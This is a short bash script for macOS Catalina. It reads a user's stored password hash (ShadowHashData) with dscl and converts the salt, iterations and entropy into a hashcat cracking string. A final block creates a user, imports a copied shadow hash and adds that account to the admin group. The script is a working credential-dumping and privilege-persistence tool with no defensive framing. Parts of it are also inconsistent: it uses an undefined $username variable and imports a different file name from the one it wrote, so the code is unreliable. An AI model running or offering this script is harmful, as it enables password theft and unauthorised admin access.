Dump shadow on macOS Catalina

ShadowHashData.sh

#!/bin/bash
USER=$1
SHADOW_HASH_DATA=$(dscl -plist . -read /Users/$USER ShadowHashData | xpath 'plist[@version="1.0"]/dict//array/string/text()' 2>/dev/null | tr -cd '[:print:]' | xxd -r -p | base64)
echo '0x0A 0x5C 0x3A 0x2C dsRecTypeStandard:Users 2 dsAttrTypeStandard:RecordName base64:dsAttrTypeNative:ShadowHashData' > $USER.dsimport
echo -n $USER:$SHADOW_HASH_DATA >> $USER.dsimport
entropy=$(echo $SHADOW_HASH_DATA | base64 -D | plutil -convert xml1 - -o - | plutil -extract 'SALTED-SHA512-PBKDF2' xml1 - -o - | plutil -extract 'entropy' xml1 - -o - | xpath 'plist[@version="1.0"]/data/text()' 2>/dev/null | tr -cd '[:print:]' | base64 -D | xxd -p | tr -d '\n')
salt=$(echo $SHADOW_HASH_DATA | base64 -D | plutil -convert xml1 - -o - | plutil -extract 'SALTED-SHA512-PBKDF2' xml1 - -o - | plutil -extract 'salt' xml1 - -o - | xpath 'plist[@version="1.0"]/data/text()' 2>/dev/null | tr -cd '[:print:]' | base64 -D | xxd -p | tr -d '\n')
iterations=$(echo $SHADOW_HASH_DATA | base64 -D | plutil -convert xml1 - -o - | plutil -extract 'SALTED-SHA512-PBKDF2' xml1 - -o - | plutil -extract 'iterations' xml1 - -o - | xpath 'plist[@version="1.0"]/integer/text()' 2>/dev/null | tr -cd '[:print:]')
echo -n \$ml\$$iterations\$$salt\$${entropy:0:128} > $USER.hashcat

/usr/sbin/sysadminctl -addUser $username
/usr/bin/dscl . -delete /Users/$username ShadowHashData
/usr/bin/dsimport user.dsimport /Local/Default M
/usr/bin/dscacheutil -flushcache
/usr/bin/dscl . append /Groups/admin GroupMembership $username